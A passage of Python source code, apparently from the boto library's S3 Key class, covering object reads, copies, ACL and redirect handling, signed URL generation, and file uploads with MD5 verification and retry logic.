'Content-Range' not in response_headers):\n self.size = int(value)\n elif name.lower() == 'content-range':\n end_range = re.sub('.*/(.*)', '\\\\1', value)\n self.size = int(end_range)\n elif name.lower() in Key.base_fields:\n self.__dict__[name.lower().replace('-', '_')] = value\n self.handle_version_headers(self.resp)\n self.handle_encryption_headers(self.resp)\n self.handle_restore_headers(self.resp)\n self.handle_addl_headers(self.resp.getheaders())\n\n def open_write(self, headers=None, override_num_retries=None):\n \"\"\"\n Open this key for writing.\n Not yet implemented\n\n :type headers: dict\n :param headers: Headers to pass in the write request\n\n :type override_num_retries: int\n :param override_num_retries: If not None will override configured\n num_retries parameter for underlying PUT.\n \"\"\"\n raise BotoClientError('Not Implemented')\n\n def open(self, mode='r', headers=None, query_args=None,\n override_num_retries=None):\n if mode == 'r':\n self.mode = 'r'\n self.open_read(headers=headers, query_args=query_args,\n override_num_retries=override_num_retries)\n elif mode == 'w':\n self.mode = 'w'\n self.open_write(headers=headers,\n override_num_retries=override_num_retries)\n else:\n raise BotoClientError('Invalid mode: %s' % mode)\n\n closed = False\n\n def close(self, fast=False):\n \"\"\"\n Close this key.\n\n :type fast: bool\n :param fast: True if you want the connection to be closed without first\n reading the content. This should only be used in cases where subsequent\n calls don't need to return the content from the open HTTP connection.\n Note: As explained at\n http://docs.python.org/2/library/httplib.html#httplib.HTTPConnection.getresponse,\n callers must read the whole response before sending a new request to the\n server. Calling Key.close(fast=True) and making a subsequent request to\n the server will work because boto will get an httplib exception and\n close/reopen the connection.\n\n \"\"\"\n if self.resp and not fast:\n self.resp.read()\n self.resp = None\n self.mode = None\n self.closed = True\n\n def next(self):\n \"\"\"\n By providing a next method, the key object supports use as an iterator.\n For example, you can now say:\n\n for bytes in key:\n write bytes to a file or whatever\n\n All of the HTTP connection stuff is handled for you.\n \"\"\"\n self.open_read()\n data = self.resp.read(self.BufferSize)\n if not data:\n self.close()\n raise StopIteration\n return data\n\n # Python 3 iterator support\n __next__ = next\n\n def read(self, size=0):\n self.open_read()\n if size == 0:\n data = self.resp.read()\n else:\n data = self.resp.read(size)\n if not data:\n self.close()\n return data\n\n def change_storage_class(self, new_storage_class, dst_bucket=None,\n validate_dst_bucket=True):\n \"\"\"\n Change the storage class of an existing key.\n Depending on whether a different destination bucket is supplied\n or not, this will either move the item within the bucket, preserving\n all metadata and ACL info bucket changing the storage class or it\n will copy the item to the provided destination bucket, also\n preserving metadata and ACL info.\n\n :type new_storage_class: string\n :param new_storage_class: The new storage class for the Key.\n Possible values are:\n * STANDARD\n * REDUCED_REDUNDANCY\n\n :type dst_bucket: string\n :param dst_bucket: The name of a destination bucket. If not\n provided the current bucket of the key will be used.\n\n :type validate_dst_bucket: bool\n :param validate_dst_bucket: If True, will validate the dst_bucket\n by using an extra list request.\n \"\"\"\n bucket_name = dst_bucket or self.bucket.name\n if new_storage_class == 'STANDARD':\n return self.copy(bucket_name, self.name,\n reduced_redundancy=False, preserve_acl=True,\n validate_dst_bucket=validate_dst_bucket)\n elif new_storage_class == 'REDUCED_REDUNDANCY':\n return self.copy(bucket_name, self.name,\n reduced_redundancy=True, preserve_acl=True,\n validate_dst_bucket=validate_dst_bucket)\n else:\n raise BotoClientError('Invalid storage class: %s' %\n new_storage_class)\n\n def copy(self, dst_bucket, dst_key, metadata=None,\n reduced_redundancy=False, preserve_acl=False,\n encrypt_key=False, validate_dst_bucket=True):\n \"\"\"\n Copy this Key to another bucket.\n\n :type dst_bucket: string\n :param dst_bucket: The name of the destination bucket\n\n :type dst_key: string\n :param dst_key: The name of the destination key\n\n :type metadata: dict\n :param metadata: Metadata to be associated with new key. If\n metadata is supplied, it will replace the metadata of the\n source key being copied. If no metadata is supplied, the\n source key's metadata will be copied to the new key.\n\n :type reduced_redundancy: bool\n :param reduced_redundancy: If True, this will force the\n storage class of the new Key to be REDUCED_REDUNDANCY\n regardless of the storage class of the key being copied.\n The Reduced Redundancy Storage (RRS) feature of S3,\n provides lower redundancy at lower storage cost.\n\n :type preserve_acl: bool\n :param preserve_acl: If True, the ACL from the source key will\n be copied to the destination key. If False, the\n destination key will have the default ACL. Note that\n preserving the ACL in the new key object will require two\n additional API calls to S3, one to retrieve the current\n ACL and one to set that ACL on the new object. If you\n don't care about the ACL, a value of False will be\n significantly more efficient.\n\n :type encrypt_key: bool\n :param encrypt_key: If True, the new copy of the object will\n be encrypted on the server-side by S3 and will be stored\n in an encrypted form while at rest in S3.\n\n :type validate_dst_bucket: bool\n :param validate_dst_bucket: If True, will validate the dst_bucket\n by using an extra list request.\n\n :rtype: :class:`boto.s3.key.Key` or subclass\n :returns: An instance of the newly created key object\n \"\"\"\n dst_bucket = self.bucket.connection.lookup(dst_bucket,\n validate_dst_bucket)\n if reduced_redundancy:\n storage_class = 'REDUCED_REDUNDANCY'\n else:\n storage_class = self.storage_class\n return dst_bucket.copy_key(dst_key, self.bucket.name,\n self.name, metadata,\n storage_class=storage_class,\n preserve_acl=preserve_acl,\n encrypt_key=encrypt_key,\n src_version_id=self.version_id)\n\n def startElement(self, name, attrs, connection):\n if name == 'Owner':\n self.owner = User(self)\n return self.owner\n else:\n return None\n\n def endElement(self, name, value, connection):\n if name == 'Key':\n self.name = value\n elif name == 'ETag':\n self.etag = value\n elif name == 'IsLatest':\n if value == 'true':\n self.is_latest = True\n else:\n self.is_latest = False\n elif name == 'LastModified':\n self.last_modified = value\n elif name == 'Size':\n self.size = int(value)\n elif name == 'StorageClass':\n self.storage_class = value\n elif name == 'Owner':\n pass\n elif name == 'VersionId':\n self.version_id = value\n else:\n setattr(self, name, value)\n\n def exists(self, headers=None):\n \"\"\"\n Returns True if the key exists\n\n :rtype: bool\n :return: Whether the key exists on S3\n \"\"\"\n return bool(self.bucket.lookup(self.name, headers=headers))\n\n def delete(self, headers=None):\n \"\"\"\n Delete this key from S3\n \"\"\"\n return self.bucket.delete_key(self.name, version_id=self.version_id,\n headers=headers)\n\n def get_metadata(self, name):\n return self.metadata.get(name)\n\n def set_metadata(self, name, value):\n # Ensure that metadata that is vital to signing is in the correct\n # case. Applies to ``Content-Type`` & ``Content-MD5``.\n if name.lower() == 'content-type':\n self.metadata['Content-Type'] = value\n elif name.lower() == 'content-md5':\n self.metadata['Content-MD5'] = value\n else:\n self.metadata[name] = value\n if name.lower() in Key.base_user_settable_fields:\n self.__dict__[name.lower().replace('-', '_')] = value\n\n def update_metadata(self, d):\n self.metadata.update(d)\n\n # convenience methods for setting/getting ACL\n def set_acl(self, acl_str, headers=None):\n if self.bucket is not None:\n self.bucket.set_acl(acl_str, self.name, headers=headers)\n\n def get_acl(self, headers=None):\n if self.bucket is not None:\n return self.bucket.get_acl(self.name, headers=headers)\n\n def get_xml_acl(self, headers=None):\n if self.bucket is not None:\n return self.bucket.get_xml_acl(self.name, headers=headers)\n\n def set_xml_acl(self, acl_str, headers=None):\n if self.bucket is not None:\n return self.bucket.set_xml_acl(acl_str, self.name, headers=headers)\n\n def set_canned_acl(self, acl_str, headers=None):\n return self.bucket.set_canned_acl(acl_str, self.name, headers)\n\n def get_redirect(self):\n \"\"\"Return the redirect location configured for this key.\n\n If no redirect is configured (via set_redirect), then None\n will be returned.\n\n \"\"\"\n response = self.bucket.connection.make_request(\n 'HEAD', self.bucket.name, self.name)\n if response.status == 200:\n return response.getheader('x-amz-website-redirect-location')\n else:\n raise self.provider.storage_response_error(\n response.status, response.reason, response.read())\n\n def set_redirect(self, redirect_location, headers=None):\n \"\"\"Configure this key to redirect to another location.\n\n When the bucket associated with this key is accessed from the website\n endpoint, a 301 redirect will be issued to the specified\n `redirect_location`.\n\n :type redirect_location: string\n :param redirect_location: The location to redirect.\n\n \"\"\"\n if headers is None:\n headers = {}\n else:\n headers = headers.copy()\n\n headers['x-amz-website-redirect-location'] = redirect_location\n response = self.bucket.connection.make_request('PUT', self.bucket.name,\n self.name, headers)\n if response.status == 200:\n return True\n else:\n raise self.provider.storage_response_error(\n response.status, response.reason, response.read())\n\n def make_public(self, headers=None):\n return self.bucket.set_canned_acl('public-read', self.name, headers)\n\n def generate_url(self, expires_in, method='GET', headers=None,\n query_auth=True, force_http=False, response_headers=None,\n expires_in_absolute=False, version_id=None,\n policy=None, reduced_redundancy=False, encrypt_key=False):\n \"\"\"\n Generate a URL to access this key.\n\n :type expires_in: int\n :param expires_in: How long the url is valid for, in seconds.\n\n :type method: string\n :param method: The method to use for retrieving the file\n (default is GET).\n\n :type headers: dict\n :param headers: Any headers to pass along in the request.\n\n :type query_auth: bool\n :param query_auth: If True, signs the request in the URL.\n\n :type force_http: bool\n :param force_http: If True, http will be used instead of https.\n\n :type response_headers: dict\n :param response_headers: A dictionary containing HTTP\n headers/values that will override any headers associated\n with the stored object in the response. See\n http://goo.gl/EWOPb for details.\n\n :type expires_in_absolute: bool\n :param expires_in_absolute:\n\n :type version_id: string\n :param version_id: The version_id of the object to GET. If specified\n this overrides any value in the key.\n\n :type policy: :class:`boto.s3.acl.CannedACLStrings`\n :param policy: A canned ACL policy that will be applied to the\n new key in S3.\n\n :type reduced_redundancy: bool\n :param reduced_redundancy: If True, this will set the storage\n class of the new Key to be REDUCED_REDUNDANCY. The Reduced\n Redundancy Storage (RRS) feature of S3, provides lower\n redundancy at lower storage cost.\n\n :type encrypt_key: bool\n :param encrypt_key: If True, the new copy of the object will\n be encrypted on the server-side by S3 and will be stored\n in an encrypted form while at rest in S3.\n\n :rtype: string\n :return: The URL to access the key\n \"\"\"\n provider = self.bucket.connection.provider\n version_id = version_id or self.version_id\n if headers is None:\n headers = {}\n else:\n headers = headers.copy()\n\n # add headers accordingly (usually PUT case)\n if policy:\n headers[provider.acl_header] = policy\n if reduced_redundancy:\n self.storage_class = 'REDUCED_REDUNDANCY'\n if provider.storage_class_header:\n headers[provider.storage_class_header] = self.storage_class\n if encrypt_key:\n headers[provider.server_side_encryption_header] = 'AES256'\n headers = boto.utils.merge_meta(headers, self.metadata, provider)\n\n return self.bucket.connection.generate_url(expires_in, method,\n self.bucket.name, self.name,\n headers, query_auth,\n force_http,\n response_headers,\n expires_in_absolute,\n version_id)\n\n def send_file(self, fp, headers=None, cb=None, num_cb=10,\n query_args=None, chunked_transfer=False, size=None):\n \"\"\"\n Upload a file to a key into a bucket on S3.\n\n :type fp: file\n :param fp: The file pointer to upload. The file pointer must\n point point at the offset from which you wish to upload.\n ie. if uploading the full file, it should point at the\n start of the file. Normally when a file is opened for\n reading, the fp will point at the first byte. See the\n bytes parameter below for more info.\n\n :type headers: dict\n :param headers: The headers to pass along with the PUT request\n\n :type num_cb: int\n :param num_cb: (optional) If a callback is specified with the\n cb parameter this parameter determines the granularity of\n the callback by defining the maximum number of times the\n callback will be called during the file\n transfer. Providing a negative integer will cause your\n callback to be called with each buffer read.\n\n :type query_args: string\n :param query_args: (optional) Arguments to pass in the query string.\n\n :type chunked_transfer: boolean\n :param chunked_transfer: (optional) If true, we use chunked\n Transfer-Encoding.\n\n :type size: int\n :param size: (optional) The Maximum number of bytes to read\n from the file pointer (fp). This is useful when uploading\n a file in multiple parts where you are splitting the file\n up into different ranges to be uploaded. If not specified,\n the default behaviour is to read all bytes from the file\n pointer. Less bytes may be available.\n \"\"\"\n self._send_file_internal(fp, headers=headers, cb=cb, num_cb=num_cb,\n query_args=query_args,\n chunked_transfer=chunked_transfer, size=size)\n\n def _send_file_internal(self, fp, headers=None, cb=None, num_cb=10,\n query_args=None, chunked_transfer=False, size=None,\n hash_algs=None):\n provider = self.bucket.connection.provider\n try:\n spos = fp.tell()\n except IOError:\n spos = None\n self.read_from_stream = False\n\n # If hash_algs is unset and the MD5 hasn't already been computed,\n # default to an MD5 hash_alg to hash the data on-the-fly.\n if hash_algs is None and not self.md5:\n hash_algs = {'md5': md5}\n digesters = dict((alg, hash_algs[alg]()) for alg in hash_algs or {})\n\n def sender(http_conn, method, path, data, headers):\n # This function is called repeatedly for temporary retries\n # so we must be sure the file pointer is pointing at the\n # start of the data.\n if spos is not None and spos != fp.tell():\n fp.seek(spos)\n elif spos is None and self.read_from_stream:\n # if seek is not supported, and we've read from this\n # stream already, then we need to abort retries to\n # avoid setting bad data.\n raise provider.storage_data_error(\n 'Cannot retry failed request. fp does not support seeking.')\n\n # If the caller explicitly specified host header, tell putrequest\n # not to add a second host header. Similarly for accept-encoding.\n skips = {}\n if boto.utils.find_matching_headers('host', headers):\n skips['skip_host'] = 1\n if boto.utils.find_matching_headers('accept-encoding', headers):\n skips['skip_accept_encoding'] = 1\n http_conn.putrequest(method, path, **skips)\n for key in headers:\n http_conn.putheader(key, headers[key])\n http_conn.endheaders()\n\n save_debug = self.bucket.connection.debug\n self.bucket.connection.debug = 0\n # If the debuglevel < 4 we don't want to show connection\n # payload, so turn off HTTP connection-level debug output (to\n # be restored below).\n # Use the getattr approach to allow this to work in AppEngine.\n if getattr(http_conn, 'debuglevel', 0) < 4:\n http_conn.set_debuglevel(0)\n\n data_len = 0\n if cb:\n if size:\n cb_size = size\n elif self.size:\n cb_size = self.size\n else:\n cb_size = 0\n if chunked_transfer and cb_size == 0:\n # For chunked Transfer, we call the cb for every 1MB\n # of data transferred, except when we know size.\n cb_count = (1024 * 1024) / self.BufferSize\n elif num_cb > 1:\n cb_count = int(\n math.ceil(cb_size / self.BufferSize / (num_cb - 1.0)))\n elif num_cb < 0:\n cb_count = -1\n else:\n cb_count = 0\n i = 0\n cb(data_len, cb_size)\n\n bytes_togo = size\n if bytes_togo and bytes_togo < self.BufferSize:\n chunk = fp.read(bytes_togo)\n else:\n chunk = fp.read(self.BufferSize)\n\n if not isinstance(chunk, bytes):\n chunk = chunk.encode('utf-8')\n\n if spos is None:\n # read at least something from a non-seekable fp.\n self.read_from_stream = True\n while chunk:\n chunk_len = len(chunk)\n data_len += chunk_len\n if chunked_transfer:\n http_conn.send('%x;\\r\\n' % chunk_len)\n http_conn.send(chunk)\n http_conn.send('\\r\\n')\n else:\n http_conn.send(chunk)\n for alg in digesters:\n digesters[alg].update(chunk)\n if bytes_togo:\n bytes_togo -= chunk_len\n if bytes_togo <= 0:\n break\n if cb:\n i += 1\n if i == cb_count or cb_count == -1:\n cb(data_len, cb_size)\n i = 0\n if bytes_togo and bytes_togo < self.BufferSize:\n chunk = fp.read(bytes_togo)\n else:\n chunk = fp.read(self.BufferSize)\n\n if not isinstance(chunk, bytes):\n chunk = chunk.encode('utf-8')\n\n self.size = data_len\n\n for alg in digesters:\n self.local_hashes[alg] = digesters[alg].digest()\n\n if chunked_transfer:\n http_conn.send('0\\r\\n')\n # http_conn.send(\"Content-MD5: %s\\r\\n\" % self.base64md5)\n http_conn.send('\\r\\n')\n\n if cb and (cb_count <= 1 or i > 0) and data_len > 0:\n cb(data_len, cb_size)\n\n http_conn.set_debuglevel(save_debug)\n self.bucket.connection.debug = save_debug\n response = http_conn.getresponse()\n body = response.read()\n\n if not self.should_retry(response, chunked_transfer):\n raise provider.storage_response_error(\n response.status, response.reason, body)\n\n return response\n\n if not headers:\n headers = {}\n else:\n headers = headers.copy()\n # Overwrite user-supplied user-agent.\n for header in find_matching_headers('User-Agent', headers):\n del headers[header]\n headers['User-Agent'] = UserAgent\n # If storage_class is None, then a user has not explicitly requested\n # a storage class, so we can assume STANDARD here\n if self._storage_class not in [None, 'STANDARD']:\n headers[provider.storage_class_header] = self.storage_class\n if find_matching_headers('Content-Encoding', headers):\n self.content_encoding = merge_headers_by_name(\n 'Content-Encoding', headers)\n if find_matching_headers('Content-Language', headers):\n self.content_language = merge_headers_by_name(\n 'Content-Language', headers)\n content_type_headers = find_matching_headers('Content-Type', headers)\n if content_type_headers:\n # Some use cases need to suppress sending of the Content-Type\n # header and depend on the receiving server to set the content\n # type. This can be achieved by setting headers['Content-Type']\n # to None when calling this method.\n if (len(content_type_headers) == 1 and\n headers[content_type_headers[0]] is None):\n # Delete null Content-Type value to skip sending that header.\n del headers[content_type_headers[0]]\n else:\n self.content_type = merge_headers_by_name(\n 'Content-Type', headers)\n elif self.path:\n self.content_type = mimetypes.guess_type(self.path)[0]\n if self.content_type is None:\n self.content_type = self.DefaultContentType\n headers['Content-Type'] = self.content_type\n else:\n headers['Content-Type'] = self.content_type\n if self.base64md5:\n headers['Content-MD5'] = self.base64md5\n if chunked_transfer:\n headers['Transfer-Encoding'] = 'chunked'\n #if not self.base64md5:\n # headers['Trailer'] = \"Content-MD5\"\n else:\n headers['Content-Length'] = str(self.size)\n # This is terrible. We need a SHA256 of the body for SigV4, but to do\n # the chunked ``sender`` behavior above, the ``fp`` isn't available to\n # the auth mechanism (because closures). Detect if it's SigV4 & embelish\n # while we can before the auth calculations occur.\n if 'hmac-v4-s3' in self.bucket.connection._required_auth_capability():\n kwargs = {'fp': fp, 'hash_algorithm': hashlib.sha256}\n if size is not None:\n kwargs['size'] = size\n headers['_sha256'] = compute_hash(**kwargs)[0]\n headers['Expect'] = '100-Continue'\n headers = boto.utils.merge_meta(headers, self.metadata, provider)\n resp = self.bucket.connection.make_request(\n 'PUT',\n self.bucket.name,\n self.name,\n headers,\n sender=sender,\n query_args=query_args\n )\n self.handle_version_headers(resp, force=True)\n self.handle_addl_headers(resp.getheaders())\n\n def should_retry(self, response, chunked_transfer=False):\n provider = self.bucket.connection.provider\n\n if not chunked_transfer:\n if response.status in [500, 503]:\n # 500 & 503 can be plain retries.\n return True\n\n if response.getheader('location'):\n # If there's a redirect, plain retry.\n return True\n\n if 200 <= response.status <= 299:\n self.etag = response.getheader('etag')\n md5 = self.md5\n if isinstance(md5, bytes):\n md5 = md5.decode('utf-8')\n\n # If you use customer-provided encryption keys, the ETag value that\n # Amazon S3 returns in the response will not be the MD5 of the\n # object.\n server_side_encryption_customer_algorithm = response.getheader(\n 'x-amz-server-side-encryption-customer-algorithm', None)\n if server_side_encryption_customer_algorithm is None:\n if self.etag != '\"%s\"' % md5:\n raise provider.storage_data_error(\n 'ETag from S3 did not match computed MD5. '\n '%s vs. %s' % (self.etag, self.md5))\n\n return True\n\n if response.status == 400:\n # The 400 must be trapped so the retry handler can check to\n # see if it was a timeout.\n # If ``RequestTimeout`` is present, we'll retry. Otherwise, bomb\n # out.\n body = response.read()\n err = provider.storage_response_error(\n response.status,\n response.reason,\n body\n )\n\n if err.error_code in ['RequestTimeout']:\n raise PleaseRetryException(\n \"Saw %s, retrying\" % err.error_code,\n response=response\n )\n\n return False\n\n def compute_md5(self, fp, size=None):\n \"\"\"\n :type fp: file\n :param fp: File pointer to the file to MD5 hash. The file\n pointer will be reset to the same position before the\n method returns.\n\n :type size: int\n :param size: (optional) The Maximum number of bytes to read\n from the file pointer (fp). This is useful when uploading\n a file in multiple parts where the file is being split\n in place into different parts. Less bytes may be available.\n \"\"\"\n hex_digest, b64_digest, data_size = compute_md5(fp, size=size)\n # Returned values are MD5 hash, base64 encoded MD5 hash, and data size.\n # The internal implementation of compute_md5() needs to return the\n # data size but we don't want to return that value to the external\n # caller because it changes the class interface (i.e. it might\n # break some code) so we consume the third tuple value here and\n # return the remainder of the tuple to the caller, thereby preserving\n # the existing interface.\n self.size = data_size\n return (hex_digest, b64_digest)\n\n def set_contents_from_stream(self, fp, headers=None, replace=True,\n cb=None, num_cb=10, policy=None,\n reduced_redundancy=False, query_args=None,\n size=None):\n \"\"\"\n Store an object using the name of the Key object as the key in\n cloud and the contents of the data stream pointed to by 'fp' as\n the contents.\n\n The stream object is not seekable and total size is not known.\n This has the implication that we can't specify the\n Content-Size and Content-MD5 in the header. So for huge\n uploads, the delay in calculating MD5 is avoided but with a\n penalty of inability to verify the integrity of the uploaded\n data.\n\n :type fp: file\n :param fp: the file whose contents are to be uploaded\n\n :type headers: dict\n :param headers: additional HTTP headers to be sent with the\n PUT request.\n\n :type replace: bool\n :param replace: If this parameter is False, the method will first check\n to see if an object exists in the bucket with the same key. If it\n does, it won't overwrite it. The default value is True which will\n overwrite the object.\n\n :type cb: function\n :param cb: a callback function that will be called to report\n progress on the upload. The callback should accept two integer\n parameters, the first representing the number of bytes that have\n been successfully transmitted to GS and the second representing the\n total number of bytes that need to be transmitted.\n\n :type num_cb: int\n :param num_cb: (optional) If a callback is specified with the\n cb parameter, this parameter determines the granularity of\n the callback by defining the maximum number of times the\n callback will be called during the file transfer.\n\n :type policy: :class:`boto.gs.acl.CannedACLStrings`\n :param policy: A canned ACL policy that will be applied to the new key\n in GS.\n\n :type reduced_redundancy: bool\n :param reduced_redundancy: If True, this will set the storage\n class of the new Key to be REDUCED_REDUNDANCY. The Reduced\n Redundancy Storage (RRS) feature of S3, provides lower\n redundancy at lower storage cost.\n\n :type size: int\n :param size: (optional) The Maximum number of bytes to read from\n the file pointer (fp). This is useful when uploading a\n file in multiple parts where you are splitting the file up\n into different ranges to be uploaded. If not specified,\n the default behaviour is to read all bytes from the file\n pointer. Less bytes may be available.\n \"\"\"\n\n provider = self.bucket.connection.provider\n if not provider.supports_chunked_transfer():\n raise BotoClientError('%s does not support chunked transfer'\n % provider.get_provider_name())\n\n # Name of the Object should be specified explicitly for Streams.\n if not self.name or self.name == '':\n raise BotoClientError('Cannot determine the destination '\n 'object name for the given stream')\n\n if headers is None:\n headers = {}\n if policy:\n headers[provider.acl_header] = policy\n\n if reduced_redundancy:\n self.storage_class = 'REDUCED_REDUNDANCY'\n if provider.storage_class_header:\n headers[provider.storage_class_header] = self.storage_class\n\n if self.bucket is not None:\n if not replace:\n if self.bucket.lookup(self.name):\n return\n self.send_file(fp, headers, cb, num_cb, query_args,\n chunked_transfer=True, size=size)\n\n def set_contents_from_file(self, fp, headers=None, replace=True,\n cb=None, num_cb=10, policy=None, md5=None,\n reduced_redundancy=False, query_args=None,\n encrypt_key=False, size=None, rewind=False):\n \"\"\"\n Store an object in S3 using the name of the Key object as the\n key in S3 and the contents of the file pointed to by 'fp' as the\n contents. The data is read from 'fp' from its current position until\n 'size' bytes have been read or EOF.\n\n :type fp: file\n :param fp: the file whose contents to upload\n\n :type headers: dict\n :param headers: Additional HTTP headers that will be sent with\n the PUT request.\n\n :type replace: bool\n :param replace: If this parameter is False, the method will\n first check to see if an object exists in the bucket with\n the same key. If it does, it won't overwrite it. The\n default value is True which will overwrite the object.\n\n :type cb: function\n :param cb: a callback function that will be called to report\n progress on the upload. The callback should accept two\n integer parameters, the first representing the number of\n bytes that have been successfully transmitted to S3 and\n the second representing the size of the to be transmitted\n object.\n\n :type num_cb: int\n :param num_cb: (optional) If a callback is specified with the\n cb parameter this parameter determines the granularity of\n the callback by defining the maximum number of times the\n callback will be called during the file transfer.\n\n :type policy: :class:`boto.s3.acl.CannedACLStrings`\n :param policy: A canned ACL policy that will be applied to the\n new key in S3.\n\n :type md5: A tuple containing the hexdigest version of the MD5\n checksum of the file as the first element and the\n Base64-encoded version of the plain checksum as the second\n element. This is the same format returned by the\n compute_md5 method.\n :param md5: If you need to compute the MD5 for any reason\n prior to upload, it's silly to have to do it twice so this\n param, if present, will be used as the MD5 values of the\n file. Otherwise, the checksum will be computed.\n\n :type reduced_redundancy: bool\n :param reduced_redundancy: If True, this will set the storage\n class of the new Key to be REDUCED_REDUNDANCY. The Reduced\n Redundancy Storage (RRS) feature of S3, provides lower\n redundancy at lower storage cost.\n\n :type encrypt_key: bool\n :param encrypt_key: If True, the new copy of the object will\n be encrypted on the server-side by S3 and will be stored\n in an encrypted form while at rest in S3.\n\n :type size: int\n :param size: (optional) The Maximum number of bytes to read\n from the file pointer (fp). This is useful when uploading\n a file in multiple parts where you are splitting the file\n up into different ranges to be uploaded. If not specified,\n the default behaviour is to read all bytes from the file\n pointer. Less bytes may be available.\n\n :type rewind: bool\n :param rewind: (optional) If True, the file pointer (fp) will\n be rewound to the start before any bytes are read from\n it. The default behaviour is False which reads from the\n current position of the file pointer (fp).\n\n :rtype: int\n :return: The number of bytes written to the key.\n \"\"\"\n provider = self.bucket.connection.provider\n headers = headers or {}\n if policy:\n headers[provider.acl_header] = policy\n if encrypt_key:\n headers[provider.server_side_encryption_header] = 'AES256'\n\n if rewind:\n # caller requests reading from beginning of fp.\n fp.seek(0, os.SEEK_SET)\n else:\n # The following seek/tell/seek logic is intended\n # to detect applications using the older interface to\n # set_contents_from_file(), which automatically rewound the\n # file each time the Key was reused. This changed with commit\n # 14ee2d03f4665fe20d19a85286f78d39d924237e, to support uploads\n # split into multiple parts and uploaded in parallel, and at\n # the time of that commit this check was added because otherwise\n # older programs would get a success status and upload an empty\n # object. Unfortuantely, it's very inefficient for fp's implemented\n # by KeyFile (used, for example, by gsutil when copying between\n # providers). So, we skip the check for the KeyFile case.\n # TODO: At some point consider removing this seek/tell/seek\n # logic, after enough time has passed that it's unlikely any\n # programs remain that assume the older auto-rewind interface.\n if not isinstance(fp, KeyFile):\n spos = fp.tell()\n fp.seek(0, os.SEEK_END)\n if fp.tell() == spos:\n fp.seek(0, os.SEEK_SET)\n if fp.tell() != spos:\n # Raise an exception as this is likely a programming\n # error whereby there is data before the fp but nothing\n # after it.\n fp.seek(spos)\n raise AttributeError('fp is at EOF. Use rewind option '\n 'or seek() to data start.')\n # seek back to the correct position.\n fp.seek(spos)\n\n if reduced_redundancy:\n self.storage_class = 'REDUCED_REDUNDANCY'\n if provider.storage_class_header:\n headers[provider.storage_class_header] = self.storage_class\n # TODO - What if provider doesn't support reduced reduncancy?\n # What if different providers provide different classes?\n if hasattr(fp, 'name'):\n self.path = fp.name\n if self.bucket is not None:\n if not md5 and provider.supports_chunked_transfer():\n # defer md5 calculation to on the fly and\n # we don't know anything about size yet.\n chunked_transfer = True\n self.size = None\n else:\n chunked_transfer = False\n if isinstance(fp, KeyFile):\n # Avoid EOF seek for KeyFile case as it's very inefficient.\n key = fp.getkey()\n size = key.size - fp.tell()\n self.size = size\n # At present both GCS and S3 use MD5 for the etag for\n # non-multipart-uploaded objects. If the etag is 32 hex\n # chars use it as an MD5, to avoid having to read the file\n # twice while transferring.\n if (re.match('^\"[a-fA-F0-9]{32}\"$', key.etag)):\n etag = key.etag.strip('\"')\n md5 = (etag, base64.b64encode(binascii.unhexlify(etag)))\n if not md5:\n # compute_md5() and also set self.size to actual\n # size of the bytes read computing the md5.\n md5 = self.compute_md5(fp, size)\n # adjust size if required\n size = self.size\n elif size:\n self.size = size\n else:\n # If md5 is provided, still need to size so\n # calculate based on bytes to end of content\n spos = fp.tell()\n fp.seek(0, os.SEEK_END)\n self.size = fp.tell() - spos\n fp.seek(spos)\n size = self.size\n self.md5 = md5[0]\n self.base64md5 = md5[1]\n\n if self.name is None:\n self.name = self.md5\n if not replace:\n if self.bucket.lookup(self.name):\n return\n\n self.send_file(fp, headers=headers, cb=cb, num_cb=num_cb,\n query_args=query_args,\n chunked_transfer=chunked_transfer, size=size)\n # return number of bytes written.\n return self.size\n\n def set_contents_from_filename(self, filename, headers=None, replace=True,\n cb=None, num_cb=10, policy=None, md5=None,\n reduced_redundancy=False,\n encrypt_key=False):\n \"\"\"\n Store an object in S3 using the name of the Key object as the\n key in S3 and the contents of the file named by 'filename'.\n See set_contents_from_file method for details about the\n parameters.\n\n :type filename: string\n :param filename: The name of the file that you want to put onto S3\n\n :type headers: dict\n :param headers: Additional headers to pass along with the\n request to AWS.\n\n :type replace: bool\n :param replace: If True, replaces the contents of the file\n if it already exists.\n\n :type cb: function\n :param cb: a callback function that will be called to report\n progress on the upload. The callback should accept two\n integer parameters, the first representing the number of\n bytes that have been successfully transmitted to S3 and\n the second representing the size of the to be transmitted\n object.\n\n :type cb: int\n :param num_cb: (optional) If a callback is specified with the\n cb parameter this parameter determines the granularity of\n the callback by defining the maximum number of times the\n callback will be called during the file transfer.\n\n :type policy: :class:`boto.s3.acl.CannedACLStrings`\n :param policy: A canned ACL policy that will be applied to the\n new key in S3.\n\n :type md5: A tuple containing the hexdigest version of the MD5\n checksum of the file as the first element and the\n Base64-encoded version of the plain checksum as the second\n element. This is the same format returned by the\n compute_md5 method.\n :param md5: If you need to compute the MD5 for any reason\n prior to upload, it's silly to have to do it twice so this\n param, if present, will be used as the MD5 values of the\n file. Otherwise, the checksum will be computed.\n\n :type reduced_redundancy: bool\n :param reduced_redundancy: If True, this will set the storage\n class of the new Key to be REDUCED_REDUNDANCY. The Reduced\n Redundancy Storage (RRS) feature of S3, provides lower\n redundancy at lower storage cost. :type encrypt_key: bool\n :param encrypt_key: If True, the new copy of the object\n will be encrypted on the server-side by S3 and will be\n stored in an encrypted form while at rest in S3.\n\n :rtype: int\n :return: The number of bytes written to the key.\n \"\"\"\n with open(filename, 'rb') as fp:\n return self.set_contents_from_file(fp, headers, replace, cb,\n num_cb, policy, md5,\n reduced_redundancy,\n encrypt_key=encrypt_key)\n\n def set_contents_from_string(self, string_data, headers=None, replace=True,\n cb=None, num_cb=10, policy=None, md5=None,\n reduced_redundancy=False,\n encrypt_key=False):\n \"\"\"\n Store an object in S3 using the name of the Key object as the\n key in S3 and the string 's' as the contents.\n See set_contents_from_file method for details about the\n parameters.\n\n :type headers: dict\n :param headers: Additional headers to pass along with the\n request to AWS.\n\n :type replace: bool\n :param replace: If True, replaces the contents of the file if\n it already exists.\n\n :type cb: function\n :param cb: a callback function that will be called to report\n progress on the upload. The callback should accept two\n integer parameters, the first representing the number of\n bytes that have been successfully transmitted to S3 and\n the second representing the size of the to be transmitted\n object.\n\n :type cb: int\n :param num_cb: (optional) If a callback is specified with the\n cb parameter this parameter determines the granularity of\n the callback by defining the maximum number of times the\n callback will be called during the file transfer.\n\n :type policy: :class:`boto.s3.acl.CannedACLStrings`\n :param policy: A canned ACL policy that will be applied to the\n new key in S3.\n\n :type md5: A tuple containing the hexdigest version of the MD5\n checksum of the file as the first element and the\n Base64-encoded version of the plain checksum as the second\n element. This is the same format returned by the\n compute_md5 method.\n :param md5: If you need to compute the MD5 for any reason\n prior to upload, it's silly to have to do it twice so this\n param, if 